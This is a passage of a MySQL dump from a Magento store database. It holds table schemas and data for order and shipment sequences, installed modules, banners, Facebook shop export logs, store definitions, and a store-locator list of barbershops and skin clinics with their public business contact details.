INSERT INTO `sequence_invoice_3` VALUES (1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93),(94),(95),(96),(97),(98),(99);

--
-- Table structure for table `sequence_invoice_4`
--

CREATE TABLE `sequence_invoice_4` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_invoice_4`
--


--
-- Table structure for table `sequence_order_0`
--

CREATE TABLE `sequence_order_0` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_order_0`
--


--
-- Table structure for table `sequence_order_1`
--

CREATE TABLE `sequence_order_1` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_order_1`
--

INSERT INTO `sequence_order_1` VALUES (1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(16),(17),(21),(25),(40),(41),(43),(44),(45),(46),(47),(48),(51),(52),(53),(54),(55),(56),(57),(59),(60),(61),(64),(65),(66),(67);

--
-- Table structure for table `sequence_order_2`
--

CREATE TABLE `sequence_order_2` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_order_2`
--


--
-- Table structure for table `sequence_order_3`
--

CREATE TABLE `sequence_order_3` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_order_3`
--

INSERT INTO `sequence_order_3` VALUES (1),(2),(3),(4),(5),(13),(14),(15),(16),(17),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(445),(448),(453),(454),(457),(463),(464),(465),(468),(469),(474),(475),(476),(477),(478),(482),(483),(484),(485),(486),(487),(488),(489),(490),(491),(495),(496),(508),(509),(516),(517),(518),(519),(520),(521),(522),(523),(525),(526),(527),(528),(532),(537),(538),(543),(547),(551),(553),(554),(555),(556),(557),(559),(562),(563),(564),(568),(569),(570),(571),(572),(573),(574),(575),(576),(577),(578),(579),(584),(585),(586),(588),(589),(594),(597),(600),(604),(605),(609),(610),(611),(612),(613),(615),(618),(625),(626),(629),(630),(631),(632),(633),(634),(635),(636),(637),(638),(639),(640),(641),(642),(643),(644),(645),(646),(647),(648),(649),(650),(651),(652),(653),(654),(655),(656),(657),(658),(659),(660),(661);

--
-- Table structure for table `sequence_order_4`
--

CREATE TABLE `sequence_order_4` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_order_4`
--


--
-- Table structure for table `sequence_shipment_0`
--

CREATE TABLE `sequence_shipment_0` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_shipment_0`
--


--
-- Table structure for table `sequence_shipment_1`
--

CREATE TABLE `sequence_shipment_1` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_shipment_1`
--

INSERT INTO `sequence_shipment_1` VALUES (1),(2),(3),(4),(5),(6),(7),(8);

--
-- Table structure for table `sequence_shipment_2`
--

CREATE TABLE `sequence_shipment_2` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_shipment_2`
--


--
-- Table structure for table `sequence_shipment_3`
--

CREATE TABLE `sequence_shipment_3` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_shipment_3`
--

INSERT INTO `sequence_shipment_3` VALUES (1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83);

--
-- Table structure for table `sequence_shipment_4`
--

CREATE TABLE `sequence_shipment_4` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_shipment_4`
--


--
-- Table structure for table `session`
--

CREATE TABLE `session` (
  `session_id` varchar(255) NOT NULL COMMENT 'Session Id',
  `session_expires` int unsigned NOT NULL DEFAULT '0' COMMENT 'Date of Session Expiration',
  `session_data` mediumblob NOT NULL COMMENT 'Session Data'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Database Sessions Storage';

--
-- Dumping data for table `session`
--


--
-- Table structure for table `setup_module`
--

CREATE TABLE `setup_module` (
  `module` varchar(50) NOT NULL COMMENT 'Module',
  `schema_version` varchar(50) DEFAULT NULL COMMENT 'Schema Version',
  `data_version` varchar(50) DEFAULT NULL COMMENT 'Data Version'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Module versions registry';

--
-- Dumping data for table `setup_module`
--

INSERT INTO `setup_module` VALUES ('ADM_QuickDevBar','0.1.18','0.1.18'),('Amazon_Core','3.3.1','3.3.1'),('Amazon_Login','3.3.1','3.3.1'),('Amazon_Payment','3.3.1','3.3.1'),('Astound_Affirm','3.2.16','3.2.16'),('Aune_Stripe','2.1.0','2.1.0'),('Coderkube_Brand','1.0.0','1.0.0'),('Dfe_Square','1.0.0','1.0.0'),('Dotdigitalgroup_Chat','1.0.0','1.0.0'),('Dotdigitalgroup_Email','4.1.0','4.1.0'),('Ideo_StoreLocator','2.0.3','2.0.3'),('Klarna_Core','5.2.3','5.2.3'),('Klarna_Kp','6.4.0','6.4.0'),('Klarna_Ordermanagement','5.0.7','5.0.7'),('Magecomp_Squareup','1.0.0','1.0.0'),('Magento_AuthorizenetAcceptjs','1.0.0','1.0.0'),('Magento_GoogleShoppingAds','4.0.1','4.0.1'),('Magento_PaypalReCaptcha','2.0.0','2.0.0'),('Magento_Securitytxt','1.0.0','1.0.0'),('Mageplaza_BannerSlider','2.0.0','2.0.0'),('Mageplaza_Blog','2.5.2','2.5.2'),('Mageplaza_Core','1.0.0','1.0.0'),('Mageplaza_DeleteOrders','1.0.0','1.0.0'),('Mageplaza_Sitemap','2.0.1','2.0.1'),('Mageplaza_Smtp','1.2.2','1.2.2'),('MGS_Brand','2.0.1','2.0.1'),('MGS_Core','0.1.0','0.1.0'),('MGS_StoreLocator','0.0.3','0.0.3'),('MSP_ReCaptcha','1.6.0','1.6.0'),('MSP_TwoFactorAuth','3.1.0','3.1.0'),('PayPal_Braintree','4.4.0','4.4.0'),('Plumrocket_Base','2.1.9','2.1.9'),('Plumrocket_ShippingTracking','1.0.4','1.0.4'),('Sparsh_Banner','1.1.0','1.1.0'),('Sparsh_FacebookShopIntegration','1.0.0','1.0.0'),('StripeIntegration_Payments','2.8.3','2.8.3'),('Swissup_Core','1.2.1','1.2.1'),('Swissup_SlickCarousel','1.0.0','1.0.0'),('Swissup_Testimonials','1.0.0','1.0.0'),('Temando_Shipping','1.6.0','1.6.0'),('TNW_Marketing','2.7.0','2.7.0'),('Varnasol_OrderLength','1.0.0','1.0.0'),('Varnasol_Topsellers','1.0.0','1.0.0'),('Vertex_AddressValidation','100.5.0','100.5.0'),('Vertex_Tax','100.5.1','100.5.1'),('Yotpo_Yotpo','3.0.1','3.0.1');

--
-- Table structure for table `shipping_tablerate`
--

CREATE TABLE `shipping_tablerate` (
  `pk` int unsigned NOT NULL COMMENT 'Primary key',
  `website_id` int NOT NULL DEFAULT '0' COMMENT 'Website ID',
  `dest_country_id` varchar(4) NOT NULL DEFAULT '0' COMMENT 'Destination coutry ISO/2 or ISO/3 code',
  `dest_region_id` int NOT NULL DEFAULT '0' COMMENT 'Destination Region ID',
  `dest_zip` varchar(10) NOT NULL DEFAULT '*' COMMENT 'Destination Post Code (Zip)',
  `condition_name` varchar(30) NOT NULL COMMENT 'Rate Condition name',
  `condition_value` decimal(12,4) NOT NULL DEFAULT '0.0000' COMMENT 'Rate condition value',
  `price` decimal(12,4) NOT NULL DEFAULT '0.0000' COMMENT 'Price',
  `cost` decimal(12,4) NOT NULL DEFAULT '0.0000' COMMENT 'Cost'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Shipping Tablerate';

--
-- Dumping data for table `shipping_tablerate`
--


--
-- Table structure for table `signifyd_case`
--

CREATE TABLE `signifyd_case` (
  `entity_id` int unsigned NOT NULL COMMENT 'Entity_id',
  `order_id` int unsigned DEFAULT NULL COMMENT 'Order_id',
  `case_id` int unsigned DEFAULT NULL COMMENT 'Case_id',
  `guarantee_eligible` tinyint(1) DEFAULT NULL COMMENT 'Guarantee_eligible',
  `guarantee_disposition` varchar(32) DEFAULT 'PENDING' COMMENT 'Guarantee_disposition',
  `status` varchar(32) DEFAULT 'PENDING' COMMENT 'Status',
  `score` int unsigned DEFAULT NULL COMMENT 'Score',
  `associated_team` text COMMENT 'Associated_team',
  `review_disposition` varchar(32) DEFAULT NULL COMMENT 'Review_disposition',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created_at',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated_at'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='signifyd_case';

--
-- Dumping data for table `signifyd_case`
--


--
-- Table structure for table `sitemap`
--

CREATE TABLE `sitemap` (
  `sitemap_id` int unsigned NOT NULL COMMENT 'Sitemap ID',
  `sitemap_type` varchar(32) DEFAULT NULL COMMENT 'Sitemap Type',
  `sitemap_filename` varchar(32) DEFAULT NULL COMMENT 'Sitemap Filename',
  `sitemap_path` varchar(255) DEFAULT NULL COMMENT 'Sitemap Path',
  `sitemap_time` timestamp NULL DEFAULT NULL COMMENT 'Sitemap Time',
  `store_id` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='XML Sitemap';

--
-- Dumping data for table `sitemap`
--


--
-- Table structure for table `sparsh_banner`
--

CREATE TABLE `sparsh_banner` (
  `banner_id` smallint NOT NULL COMMENT 'Banner Id',
  `banner_title` varchar(255) NOT NULL COMMENT 'Banner Title',
  `banner_description` mediumtext COMMENT 'Banner Description',
  `banner_type` varchar(255) NOT NULL DEFAULT 'Image' COMMENT 'Banner Type',
  `banner_image` varchar(255) DEFAULT NULL COMMENT 'Banner Image',
  `banner_video` varchar(255) DEFAULT NULL COMMENT 'Banner Video',
  `banner_youtube` varchar(255) DEFAULT NULL COMMENT 'Banner Youtube',
  `banner_video_autoplay` smallint DEFAULT NULL COMMENT 'Banner Video Autoplay',
  `start_date` datetime DEFAULT NULL COMMENT 'Banner Start Date',
  `end_date` datetime DEFAULT NULL COMMENT 'Banner End Date',
  `label_button_text` varchar(255) NOT NULL COMMENT 'Banner button text',
  `call_to_action` varchar(255) NOT NULL COMMENT 'Banner Action',
  `position` int NOT NULL COMMENT 'Position',
  `is_active` smallint NOT NULL DEFAULT '1' COMMENT 'Is Banner Active?',
  `creation_time` datetime NOT NULL COMMENT 'Creation Time',
  `update_time` datetime NOT NULL COMMENT 'Update Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sparsh Banner';

--
-- Dumping data for table `sparsh_banner`
--

INSERT INTO `sparsh_banner` VALUES (1,'',NULL,'Image','sparsh/banner/image/b/a/banner-2.jpg',NULL,NULL,1,NULL,NULL,'DR. FEELGOOD SKIN','',0,1,'2020-07-27 10:45:44','2020-07-27 10:45:44'),(2,'',NULL,'Image','sparsh/banner/image/b/a/banner1.jpg',NULL,NULL,1,NULL,NULL,'','',0,1,'2020-07-27 10:46:10','2020-07-27 10:46:10'),(3,'',NULL,'Image','sparsh/banner/image/b/a/banner12.png',NULL,NULL,1,NULL,NULL,'','',0,1,'2020-07-27 10:47:08','2020-07-27 10:47:08');

--
-- Table structure for table `sparsh_facebook_shop_attribute_mapping`
--

CREATE TABLE `sparsh_facebook_shop_attribute_mapping` (
  `entity_id` int unsigned NOT NULL COMMENT 'Entity ID',
  `facebook_attribute` varchar(255) NOT NULL COMMENT 'Facebook Attribute',
  `magento_attribute` varchar(255) NOT NULL COMMENT 'Magento Attribute'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sparsh Facebook Shop Attribute Mapping';

--
-- Dumping data for table `sparsh_facebook_shop_attribute_mapping`
--

INSERT INTO `sparsh_facebook_shop_attribute_mapping` VALUES (1,'id','sku'),(2,'title','name'),(3,'description','description'),(4,'availability','quantity_and_stock_status'),(5,'condition','fb_product_condition'),(6,'image_link','image'),(7,'brand','country_of_manufacture');

--
-- Table structure for table `sparsh_facebook_shop_csv_log`
--

CREATE TABLE `sparsh_facebook_shop_csv_log` (
  `csv_id` int unsigned NOT NULL COMMENT 'CSV ID',
  `generated_by` varchar(255) NOT NULL COMMENT 'Generated By',
  `product_ids` text NOT NULL COMMENT 'Product Ids',
  `status` varchar(255) NOT NULL COMMENT 'Status',
  `message` varchar(255) NOT NULL COMMENT 'Message',
  `started_at` timestamp NULL DEFAULT NULL COMMENT 'Started At',
  `finished_at` timestamp NULL DEFAULT NULL COMMENT 'Finished At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Sparsh Facebook Shop CSV Log';

--
-- Dumping data for table `sparsh_facebook_shop_csv_log`
--

INSERT INTO `sparsh_facebook_shop_csv_log` VALUES (1,'admin','','Success','CSV generated successfully at pub/import/sparsh/facebook_shop/facebook_shop_products_2020-10-02_19_16_02.csv','2020-10-02 19:16:02','2020-10-02 19:16:03'),(2,'admin','','Success','CSV generated successfully at pub/import/sparsh/facebook_shop/facebook_shop_products_2020-10-03_08_26_47.csv','2020-10-03 08:26:47','2020-10-03 08:26:48'),(3,'admin','','Success','CSV generated successfully at pub/import/sparsh/facebook_shop/facebook_shop_products_2020-10-05_06_53_29.csv','2020-10-05 06:53:29','2020-10-05 06:53:29'),(4,'admin','','Success','CSV generated successfully at pub/import/sparsh/facebook_shop/facebook_shop_products_2020-10-08_14_52_19.csv','2020-10-08 14:52:19','2020-10-08 14:52:19'),(5,'admin','1','Success','CSV generated successfully at pub/import/sparsh/facebook_shop/facebook_shop_products_2020-10-20_18_33_11.csv','2020-10-20 18:33:11','2020-10-20 18:33:12'),(6,'admin','1','Success','CSV generated successfully at pub/import/sparsh/facebook_shop/facebook_shop_products_2020-10-20_18_39_29.csv','2020-10-20 18:39:29','2020-10-20 18:39:29'),(7,'admin','1','Success','CSV generated successfully at pub/import/sparsh/facebook_shop/facebook_shop_products_2020-10-20_18_43_27.csv','2020-10-20 18:43:27','2020-10-20 18:43:28'),(8,'admin','1,3,6,10,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88','Success','CSV generated successfully at pub/import/sparsh/facebook_shop/facebook_shop_products_2020-10-21_04_45_02.csv','2020-10-21 04:45:02','2020-10-21 04:45:05');

--
-- Table structure for table `store`
--

CREATE TABLE `store` (
  `store_id` smallint unsigned NOT NULL COMMENT 'Store ID',
  `code` varchar(32) DEFAULT NULL COMMENT 'Code',
  `website_id` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Website ID',
  `group_id` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Group ID',
  `name` varchar(255) NOT NULL COMMENT 'Store Name',
  `sort_order` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Store Sort Order',
  `is_active` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Store Activity'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores';

--
-- Dumping data for table `store`
--

INSERT INTO `store` VALUES (0,'admin',0,0,'Admin',0,1),(1,'default',1,1,'www.varnasol.com',0,1),(2,'maleface_com',2,2,'maleface.com',2,1),(3,'imperialtouch_com',3,3,'imperialtouch.com',3,1),(4,'bilaljeanpaul_com',4,4,'bilaljeanpaul.com',0,1),(5,'kaptrone_com',5,5,'kaptrone.com',0,1);

--
-- Table structure for table `store_group`
--

CREATE TABLE `store_group` (
  `group_id` smallint unsigned NOT NULL COMMENT 'Group ID',
  `website_id` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Website ID',
  `name` varchar(255) NOT NULL COMMENT 'Store Group Name',
  `root_category_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'Root Category ID',
  `default_store_id` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Default Store ID',
  `code` varchar(32) DEFAULT NULL COMMENT 'Store group unique code'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Store Groups';

--
-- Dumping data for table `store_group`
--

INSERT INTO `store_group` VALUES (0,0,'Default',0,0,'default'),(1,1,'www.varnasol.com',2,1,'main_website_store'),(2,2,'maleface.com',79,2,'maleface_com'),(3,3,'imperialtouch.com',33,3,'imperialtouch_com'),(4,4,'bilaljeanpaul.com',87,4,'bilaljeanpaul_com'),(5,5,'kaptrone.com',89,5,'kaptrone_com');

--
-- Table structure for table `store_locator`
--

CREATE TABLE `store_locator` (
  `id` int unsigned NOT NULL COMMENT 'Store Locator Id',
  `name` varchar(250) NOT NULL COMMENT 'Store Name',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created At',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated At',
  `image` varchar(250) DEFAULT NULL COMMENT 'Store Image',
  `email` varchar(250) DEFAULT NULL COMMENT 'Store Email',
  `phone_number` varchar(50) DEFAULT NULL COMMENT 'Store Phone Number',
  `fax` varchar(50) DEFAULT NULL COMMENT 'Store Fax',
  `website` varchar(250) DEFAULT NULL COMMENT 'Store website',
  `street_address` text COMMENT 'Address',
  `country` varchar(250) DEFAULT NULL COMMENT 'Country',
  `state` varchar(250) DEFAULT NULL COMMENT 'State',
  `city` varchar(250) DEFAULT NULL COMMENT 'City',
  `zipcode` varchar(250) DEFAULT NULL COMMENT 'Zip Code',
  `description` text COMMENT 'Description',
  `trading_hours` text COMMENT 'Trading Hours',
  `radius` varchar(64) DEFAULT NULL COMMENT 'Radius',
  `zoom_level` varchar(64) DEFAULT NULL COMMENT 'Zoom Level',
  `status` int NOT NULL DEFAULT '0' COMMENT 'Store Status',
  `lat` varchar(50) DEFAULT '' COMMENT 'Latitude',
  `lng` varchar(50) DEFAULT '' COMMENT 'Longitude'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Store Locators';

--
-- Dumping data for table `store_locator`
--

INSERT INTO `store_locator` VALUES (1,'Knapps Hair Center','2021-03-11 17:58:31','2021-03-18 12:25:12','mgs_storelocator/k/n/knapps.jpg',NULL,'(480) 844-1514',NULL,'https://www.facebook.com/knappshair/','1241 E Broadway Rd #1','US','AZ','Mesa','85204','<p>Full service Barbershop located in the East Valley. Knapps Hair Center has been in business for more than 12 years and continues to shine!</p>',NULL,NULL,NULL,1,'33.407520','-111.803420'),(2,'JJ\'s Barber Shop','2021-03-15 13:39:22','2021-03-15 13:41:36','mgs_storelocator/j/j/jjs.gif',NULL,' (404) 288-5786',NULL,'jjsbarber.com/','3570 Memorial Drive,  Suite 102','US','GA','Decatur','30032','<p>JJ\'s Barber Shop is a traditional neighborhood barber shop established in 1991. JJ\'s prides itself on giving great consistent quality cuts and customer service. JJ\'s offers a family friendly environment with a great atmosphere. Feel free to Walk-In or Book an Appointment for your next service.&nbsp; &nbsp;&nbsp;</p>',NULL,NULL,NULL,1,'30.793930','-84.411070'),(3,'Apogee Barber Shop','2021-03-15 13:58:47','2021-03-15 13:58:47','mgs_storelocator/a/p/apogee.jpg',NULL,'(770) 484-1244',NULL,'instagram.com/apogeebarbershop/','2998 Turner Hill Rd #103','US','Lithonia','GA','30038','Cool place and a great place to get a haircut from.  Very good atmosphere, great service, nice and clean.  Experienced barbers ready to service you.',NULL,NULL,NULL,1,'33.695292','-84.088208'),(4,'Prime Time Barber Shop','2021-03-15 21:19:55','2021-03-16 09:12:03','mgs_storelocator/p/r/primetime.jpeg',NULL,'404-914-0206',NULL,NULL,'2375 Wesley Chapel Rd # 16A,','US','GA','Decatur','30035',NULL,NULL,NULL,NULL,1,'33.719163','-84.216027'),(5,'Under The Tracks Barbershop','2021-03-16 09:20:31','2021-03-16 09:59:11','mgs_storelocator/f/r/fred.jpeg',NULL,'(404) 500-1093',NULL,'under-the-tracks-barbershop.business.site','2611 Martin Luther King, Jr Dr SW #4','US','GA','Atlanta','30311','<p>Good quality haircuts, and service. This place great people great coversation.</p>',NULL,NULL,NULL,1,'33.754054','-84.473292'),(6,'Colin Barnes & Sons Enterprise','2021-03-16 09:32:23','2021-03-16 09:59:53','mgs_storelocator/c/o/colin.jpg',NULL,'678-772-4433',NULL,NULL,'1516 Woodington Circle','US','GA','Lawrenceville','30044','<p>20 years of barber experience and service in Lawrenceville, GA.</p>',NULL,NULL,NULL,1,'33.939865','-84.126994'),(7,'Off the Hook Barber Shop','2021-03-16 09:42:23','2021-03-16 10:01:25','mgs_storelocator/k/a/karl.jpg','kblove@bellsouth.net','(404) 589-4625',NULL,'off-the-hook-barber-shop.hub.biz/','251 Peters St SW','US','GA','Atlanta','30313','Specializing in fades, tapers, line-ups, fros, mohawks, and many more...',NULL,NULL,NULL,1,'33.747881','-84.401658'),(8,'Houseman Special Cuts','2021-03-16 09:50:41','2021-03-16 09:50:41',NULL,NULL,'219-331-6960',NULL,NULL,'616 Belden St.','US','Indiana','Michigan City','46360',NULL,NULL,NULL,NULL,1,'41.706977','-86.888642'),(9,'Royal Roots Barber Shop','2021-03-16 09:58:43','2021-03-16 10:02:01','mgs_storelocator/r/o/royal.jpg','royalrootsbarber@gmail.com','(404) 761-6888',NULL,'royalrootsbarbershop.com/','2479 Delowe Dr','US','GA','East Point','30344','<p>Specializing in fades, tapers, line-ups, fros, mohawks, and many more...</p>',NULL,NULL,NULL,1,'33.714327','-84.463688'),(10,'E-Styles unlimited Barber Shop','2021-03-16 10:13:56','2021-03-16 10:14:23','mgs_storelocator/e/r/eric.jpeg',NULL,'(404) 250-3933',NULL,'twitter.com/estylessalon','6128 Roswell Rd, NE','US','GA','Sandy Springs','30342','<p>After 5 years in Atlanta (Sandy Springs), GA, E-Styles Unlimited Barbershop and Beauty Salon has become a staple within the local community. Great shop and excellent service from the owner and barbers. The location is clean and professional. Most importantly, the owner is punctual and attentive to customer needs during the visit.</p>',NULL,NULL,NULL,1,'33.922535','-84.379482'),(11,'Tanza Barber Shop','2021-03-16 10:34:08','2021-03-16 10:35:20','mgs_storelocator/t/a/tanza.jpeg',NULL,'340-777-1735',NULL,NULL,'30 Nisky Shopping Center','US','VI','St. Thomas','00802','<p>Best barber shop in the Virgin Islands.</p>',NULL,NULL,NULL,1,'18.336464','-64.95367'),(12,'Acne Treatment Center','2021-03-16 12:17:12','2021-03-16 12:17:37','mgs_storelocator/a/c/acne.png',NULL,'(360) 852-8457',NULL,'acnetreatmentcenterwa.com','13115 NE 4th St #130,','US','WA','Vancouver','98684','<p>Jane Neville Dudik, founder and owner of The Acne Treatment Center, is a licensed master esthetician, a certified aesthetic consultant and a certified acne specialist. She has pursued studies with CIDESCO, the Physician’s Care Alliance, the International Dermal Institute, and The Aesthetic Practitioners’ Association. She holds her Bachelor’s Degree from Duke University and her Master’s Degree from Harvard University.</p>',NULL,NULL,NULL,1,'45.622424','-122.53754'),(13,'Clinically Clear Skin Rehab Center','2021-03-18 11:34:55','2021-03-18 11:34:55',NULL,'info@clinicallyclear.com','510.370.3333',NULL,'clinicallyclear.com','333 Estudillo Avenue – Suite 103 ','US','CA','San Leandro','94577','<p>Clinically Clear® Skin Rehab Center is a Bay Area acne clinic and skin care center specializing in skin of color, located in downtown San Leandro, near Oakland, California. Areas of expertise include acne treatment and long-term acne control, razor bumps, scalp bumps and scarring, hyperpigmentation (dark spots, melasma, and uneven skin tone), sports-related skin problems, obesity-related skin issues, and acne scar treatment. See more information about the center here</p>',NULL,NULL,NULL,1,'37.725527','-122.153095'),(14,'V+S Salon Studio','2021-03-18 12:15:34','2021-03-18 12:15:34',NULL,NULL,'(678) 754-5356',NULL,NULL,'1533 Ralph David Abernathy Blvd, SW','US','GA','Atlanta','30310',NULL,NULL,NULL,NULL,1,'33.743503','-84.437722'),(15,'The Quad Barber Shop','2021-03-18 12:23:14','2021-03-18 12:23:14','mgs_storelocator/q/u/quad.jpeg',NULL,'(404) 883-3545',NULL,NULL,'1400 Veterans Memorial Hwy SE Unit 142,','US','GA','Mableton','30126','<p>Qaadir does a wonderful job grooming his customers. They always leave the shop looking fresh with their new haircuts and feeling confident.</p>',NULL,NULL,NULL,1,'33.800374','-84.515181'),(16,'Class A Barber Shop','2021-03-18 12:39:11','2021-03-18 12:39:11','mgs_storelocator/s/l/slash.jpeg','classabarbershop@yahoo.com','770-210-5115',NULL,NULL,'7585 Highway 85','US','GA','Riverdale','30274','<p>Class A Barber Shop is located at 7976 Highway 85 in Riverdale, GA - Clayton County and is a business listed in the categories Barbers and Barber Shops. After you do business with Class a Barber Shop, please leave a review.</p>',NULL,NULL,NULL,1,'33.547673','-84.415134'),(17,'Ivy Urban Couture','2021-03-18 14:25:44','2021-03-18 14:25:44','mgs_storelocator/i/v/ivy.jpeg',NULL,'(216) 346-2577',NULL,'https://www.facebook.com/Ivys-Urban-Couture-102924255129556','7850 Mentor Ave Great Lakes Mall ','US','OH','Mentor','44060','<p>we have men and women clothing ranging from jeans to suit s dresses and we also have a afro eccentric merchandise we also have watches and sneakers.</p>',NULL,NULL,NULL,1,'41.657231','-81.361323'),(18,'Vintage The Barber Shop','2021-03-18 15:18:53','2021-03-18 15:18:53','mgs_storelocator/v/i/vintage.png',NULL,'(404) 521-1451',NULL,'vintagethebarbershop.com','57 FORSYTH STREET NW','US','GA','Atlanta','30303','<p>Vintage Barbershop&nbsp;is tucked inside the historic Healy Building in downtown Atlanta. The Healy Building was built in 1913 and was the first skyscraper erected in Georgia after the Civil War. The current owner&nbsp;of Vintage Barbershop,&nbsp;Herbert Williams, purchased the barbershop in 2004 from the previous owner and barber, Bill White. When Mr. Williams opened Vintage he was dedicated to preserve the history of the barbershop and maintained the original vintage decor and accents.&nbsp;</p>','<p class=\"font_9\">MON-WED &nbsp; &nbsp; 9AM-6PM</p>\r\n<p class=\"font_9\">THURS-FRI&nbsp; &nbsp; &nbsp;8AM-7PM</p>\r\n<p class=\"font_7\">SAT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 9AM-7PM</p>\r\n<p class=\"font_9\">SUN &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; BY APPT ONLY</p>',NULL,NULL,1,'33.756102','-84.389862'),(19,'Better Cuts Barber Shop','2021-03-18 16:02:36','2021-03-18 16:02:36','mgs_storelocator/b/e/better.jpg',NULL,'678-613-7566',NULL,NULL,'3723 Covington Hwy  Suite B','US','GA','Decatur','30032',NULL,NULL,NULL,NULL,1,'33.76074','-84.246719'),(20,'Salaam West Barber & Style','2021-03-18 16:12:55','2021-03-18 16:12:55',NULL,NULL,'(205) 785-9764',NULL,NULL,'420 Tuscaloosa Ave','US','AL','Birmingham','35211',NULL,'<div class=\"day-of-week current-day \"><span class=\"day-label\">Thursday</span>\r\n<div class=\"day-wrapper\">\r\n<div class=\"day-value\">8:00 AM - 6:00 PM</div>\r\n</div>\r\n</div>\r\n<div class=\"day-of-week \"><span class=\"day-label\">Friday</span>\r\n<div class=\"day-wrapper\">\r\n<div class=\"day-value\">8:00 AM - 6:00 PM</div>\r\n</div>\r\n</div>\r\n<div class=\"day-of-week \"><span class=\"day-label\">Saturday</span>\r\n<div class=\"day-wrapper\">\r\n<div class=\"day-value\">8:00 AM - 7:00 PM</div>\r\n</div>\r\n</div>\r\n<div class=\"day-of-week \"><span class=\"day-label\">Sunday</span>\r\n<div class=\"day-value\">Closed</div>\r\n</div>\r\n<div class=\"day-of-week \"><span class=\"day-label\">Monday</span>\r\n<div class=\"day-value\">Closed</div>\r\n</div>\r\n<div class=\"day-of-week \"><span class=\"day-label\">Tuesday</span>\r\n<div class=\"day-wrapper\">\r\n<div class=\"day-value\">8:00 AM - 6:00 PM</div>\r\n</div>\r\n</div>\r\n<div class=\"day-of-week \"><span class=\"day-label\">Wednesday</span>\r\n<div class=\"day-wrapper\">\r\n<div class=\"day-value\">8:00 AM - 6:00 PM</div>\r\n</div>\r\n</div>',NULL,NULL,1,'33.50163','-86.840774'),(21,'G B\'s Barber Shop','2021-03-18 16:23:10','2021-03-18 16:33:32','mgs_storelocator/g/b/gb.jpeg',NULL,'(404) 288-5600',NULL,NULL,'3285 Columbia Woods Dr','US','GA','Decatur','30032',NULL,NULL,NULL,NULL,1,'33.719052','-84.256341'),(22,'Respect Stylez 